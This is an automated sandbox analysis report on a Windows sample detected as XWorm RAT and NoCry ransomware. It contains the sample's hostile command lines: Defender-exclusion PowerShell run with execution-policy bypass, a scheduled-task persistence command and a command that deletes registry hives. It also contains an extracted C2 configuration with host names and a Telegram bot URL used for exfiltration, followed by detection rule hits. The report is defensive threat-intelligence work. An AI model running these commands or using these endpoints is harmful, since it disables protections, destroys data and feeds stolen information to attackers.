Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8svMXMXNRn.exe

Overview

General Information

Sample name:8svMXMXNRn.exe
renamed because original name is a hash value
Original sample name:4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe.exe
Analysis ID:1532623
MD5:e91f3ec430934cf29cda88d9b730d893
SHA1:6453d1f200f568b7964861c683a4f519431a9468
SHA256:4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe
Tags:exeuser-Chainskilabs
Infos:

Detection

NoCry, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected NoCry Ransomware
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Drops PE files with benign system names
Infects the VBR (Volume Boot Record) of the hard disk
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes directly to the primary disk partition (DR0)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 8svMXMXNRn.exe (PID: 6472 cmdline: "C:\Users\user\Desktop\8svMXMXNRn.exe" MD5: E91F3EC430934CF29CDA88D9B730D893)
    • BootstrapperV21.exe (PID: 6524 cmdline: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
      • powershell.exe (PID: 1848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5144 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • voosiq.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Local\Temp\voosiq.exe" MD5: BD950F6C677CD5E6C0D39FE8E6543E37)
        • TrojanXD.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Local\Temp\TrojanXD.exe" MD5: 9776B41CC11329E32CA35A161F0AF774)
          • cmd.exe (PID: 4424 cmdline: "C:\Windows\System32\cmd.exe" /k reg delete HKCR /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 1380 cmdline: reg delete HKCR /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • wscript.exe (PID: 5520 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • WerFault.exe (PID: 348 cmdline: C:\Windows\system32\WerFault.exe -u -p 6524 -s 1264 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Bootstrapper.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" MD5: 4B94B989B0FE7BEC6311153B309DFE81)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • BootstrapperV1.22.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate true MD5: 2A4DCF20B82896BE94EB538260C5FB93)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7452 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 7492 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • WerFault.exe (PID: 7812 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • explorer.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • explorer.exe (PID: 8112 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • explorer.exe (PID: 7444 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • svchost.exe (PID: 5972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • explorer.exe (PID: 7320 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • Music.UI.exe (PID: 5992 cmdline: "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca MD5: F963F75C0AD152437E10D656A00793A3)
  • explorer.exe (PID: 1356 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: B3A1A7EF45C3A920F515ADC541EE75F4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "cash-hispanic.gl.at.ply.gg"], "Port": "1764", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "Utorrent.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    \Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Roaming\explorer.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\explorer.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\explorer.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x11835:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x118d2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x119e7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x10748:$cnc4: POST / HTTP/1.1
          C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x11875:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x11912:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x11a27:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x10788:$cnc4: POST / HTTP/1.1
                00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x11635:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x116d2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x117e7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x10548:$cnc4: POST / HTTP/1.1
                  Click to see the 7 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.0.BootstrapperV21.exe.750000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    2.0.BootstrapperV21.exe.750000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.0.BootstrapperV21.exe.750000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x11835:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x118d2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x119e7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x10748:$cnc4: POST / HTTP/1.1

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ProcessId: 6524, TargetFilename: C:\Users\user\AppData\Roaming\explorer.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: System File Execution Location Anomaly
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\explorer.exe, CommandLine: C:\Users\user\AppData\Roaming\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\explorer.exe, ProcessId: 5344, ProcessName: explorer.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\voosiq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\voosiq.exe, ParentProcessId: 7276, ParentProcessName: voosiq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , ProcessId: 5520, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\explorer.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ProcessId: 6524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ProcessId: 6524, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", ProcessId: 5144, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe", ProcessId: 5144, ProcessName: schtasks.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\voosiq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\voosiq.exe, ParentProcessId: 7276, ParentProcessName: voosiq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs" , ProcessId: 5520, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, ParentProcessId: 6524, ParentProcessName: BootstrapperV21.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe', ProcessId: 1848, ProcessName: powershell.exe
                      Sigma detected: Suspicious Network Command
                      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate true, ParentImage: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe, ParentProcessId: 7376, ParentProcessName: BootstrapperV1.22.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7452, ProcessName: cmd.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
